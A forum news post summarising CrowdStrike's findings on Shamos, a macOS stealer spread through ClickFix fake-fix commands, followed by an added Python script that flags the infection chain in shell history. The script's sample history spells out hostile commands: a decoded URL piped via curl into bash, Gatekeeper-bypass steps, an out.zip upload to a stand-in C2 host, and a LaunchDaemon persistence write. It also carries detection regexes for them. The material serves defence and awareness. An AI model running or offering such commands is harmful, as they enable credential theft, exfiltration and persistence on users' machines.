NEWS Mac Means Safe? No. A New Trojan Steals Everything—From Passwords to Cryptocurrency

ExcalibuR

Joined Jan 17, 2025
Attackers have a new lure: they offer to "help" fix your Mac, and steal your passwords in the process.

Researchers from CrowdStrike have identified a new macOS infection campaign that delivers a malicious program called Shamos. The Trojan is a variant of the Atomic macOS Stealer (AMOS), a known macOS information stealer, and is operated by the group CrowdStrike tracks as COOKIE SPIDER. Shamos's primary goal is to steal passwords, Keychain credentials, Apple Notes, cryptocurrency wallets, and browser data.

Since June 2025, Shamos has been detected in more than three hundred infection attempts worldwide. It is distributed via the ClickFix technique, in which attackers publish instructions disguised as tips for fixing errors or configuring the system. The most common lures are malicious advertisements and fake GitHub repositories. Users are told to copy a command into the macOS Terminal and run it, supposedly to fix a driver or printer-setup problem. In reality, the command decodes a Base64-encoded URL and downloads a malicious Bash script from a remote server.

The script first prompts for and captures the user's password, then downloads the Shamos binary, strips its quarantine attribute with xattr and marks it executable with chmod, which bypasses the Gatekeeper check that would otherwise block an unsigned download. On launch, the malware checks whether it is running in a virtual machine and then runs a set of AppleScript commands for reconnaissance and system information gathering.

The stolen data is packed into an archive named out.zip and exfiltrated to the operators' server with curl. If Shamos is run with administrator privileges, it also establishes persistence: it writes a com.finder.helper.plist file into the LaunchDaemons directory so that it is loaded at every macOS startup. CrowdStrike notes that the program can fetch additional modules, including a fake Ledger Live cryptocurrency wallet application and botnet components.

ClickFix attacks are becoming an increasingly common method for malware delivery. They are disguised as CAPTCHAs, Google Meet tips, TikTok videos, and now as "error fixes" for Mac. The technique is so effective that it is used not only by cybercriminal groups but also by state-sponsored actors in their attacks.

macOS users are advised not to execute commands from random instructions found online, especially from advertising links or unverified GitHub repositories. For assistance, it's better to use the system's built-in help (Cmd + Space → Help) or official Apple Community forums where posts are moderated.
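The chain described in the post (a Base64-encoded URL decoded in the Terminal, a script fetched and piped to a shell, xattr plus chmod on the downloaded file, a zip uploaded with curl, a plist written to LaunchDaemons) is easy to spot after the fact in shell history or process-command-line telemetry. The following Python script is an added example, written for this page and not taken from CrowdStrike or from the poster; it decodes the URL hidden in a ClickFix one-liner and correlates the later stages into a verdict. The regexes, the sample history and the example.invalid URLs are constructed assumptions for illustration, not indicators from the report. On a real Mac you would feed it ~/.zsh_history or EDR process events instead of the built-in sample.

```python
"""Triage helper for the ClickFix -> stealer chain described above.

Constructed example: the regexes are assumptions about how such commands
usually look, and every URL/path below is invented (example.invalid).
"""
import base64
import binascii
import re
from typing import Optional

# Stage 1: `echo <base64> | base64 -d` (macOS also accepts -D) feeding curl/bash.
B64_PIPE_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{12,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)"
)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b")
CURL_RE = re.compile(r"\bcurl\b")
# Stage 2: Gatekeeper bypass = quarantine attribute removed + file made executable.
QUARANTINE_RE = re.compile(r"\bxattr\s+(?:-r\s+)?(?:-d\s+com\.apple\.quarantine|-c)\s+(\S+)")
CHMOD_EXEC_RE = re.compile(r"\bchmod\s+(?:\+x|a\+x|u\+x|[0-7]*[1357][0-7]*)\s+(\S+)")
# Stage 3/4: zip archive uploaded with curl, LaunchDaemon plist written.
ZIP_EXFIL_RE = re.compile(r"\bcurl\b.*(?:-F|--form|-T|--upload-file|--data-binary)\s+\S*\.zip")
LAUNCHD_RE = re.compile(r"/Library/LaunchDaemons/([\w.\-]+\.plist)")


def decode_clickfix_url(command: str) -> Optional[str]:
    """Return the http(s) URL hidden in an `echo <b64> | base64 -d` one-liner, else None."""
    m = B64_PIPE_RE.search(command)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace").strip()
    except (binascii.Error, ValueError):
        return None
    return decoded if decoded.startswith(("http://", "https://")) else None


def classify_line(line: str) -> list[str]:
    """Tag one command line with every chain stage it matches (may be empty)."""
    tags = []
    if B64_PIPE_RE.search(line):
        tags.append("b64_decode")
    if CURL_RE.search(line) and PIPE_TO_SHELL_RE.search(line):
        tags.append("curl_pipe_shell")
    if QUARANTINE_RE.search(line):
        tags.append("quarantine_strip")
    if CHMOD_EXEC_RE.search(line):
        tags.append("chmod_exec")
    if ZIP_EXFIL_RE.search(line):
        tags.append("zip_upload")
    if LAUNCHD_RE.search(line):
        tags.append("launchdaemon")
    return tags


def triage(lines: list[str]) -> dict:
    """Correlate per-line tags into a chain-level summary.

    A single `chmod +x` is normal developer behaviour, so the verdict is
    'clickfix_chain' only when a delivery step (decode or curl|bash) is seen
    together with at least one post-download step.
    """
    urls, plists, stripped, chmodded, stages = [], [], set(), set(), set()
    for line in lines:
        stages.update(classify_line(line))
        url = decode_clickfix_url(line)
        if url:
            urls.append(url)
        if (m := QUARANTINE_RE.search(line)):
            stripped.add(m.group(1))
        if (m := CHMOD_EXEC_RE.search(line)):
            chmodded.add(m.group(1))
        if (m := LAUNCHD_RE.search(line)):
            plists.append(m.group(1))
    delivery = bool(stages & {"b64_decode", "curl_pipe_shell"})
    followup = bool(stages & {"quarantine_strip", "chmod_exec", "zip_upload", "launchdaemon"})
    verdict = "clickfix_chain" if delivery and followup else ("suspicious" if stages else "clean")
    return {
        "urls": urls,
        "gatekeeper_bypass": sorted(stripped & chmodded),  # same file stripped AND chmodded
        "launchdaemons": plists,
        "stages": sorted(stages),
        "verdict": verdict,
    }


# Constructed sample history mirroring the stages in the post; not real telemetry.
_FAKE_B64 = base64.b64encode(b"https://example.invalid/fix.sh").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    f"echo '{_FAKE_B64}' | base64 -d | xargs curl -fsSL | bash",
    "xattr -d com.apple.quarantine /tmp/update",
    "chmod +x /tmp/update",
    "/tmp/update",
    "curl -X POST -F 'file=@/tmp/out.zip' http://c2.example.invalid/upload",
    "sudo cp helper.plist /Library/LaunchDaemons/com.finder.helper.plist",
    "git status",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_HISTORY).items():
        print(f"{key}: {value}")
```

Run it against a real history with `triage(open(os.path.expanduser("~/.zsh_history")).read().splitlines())`; the `gatekeeper_bypass` list is the most useful field, because a file that had its quarantine attribute removed and was then made executable is exactly the artefact Gatekeeper never got to inspect.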
 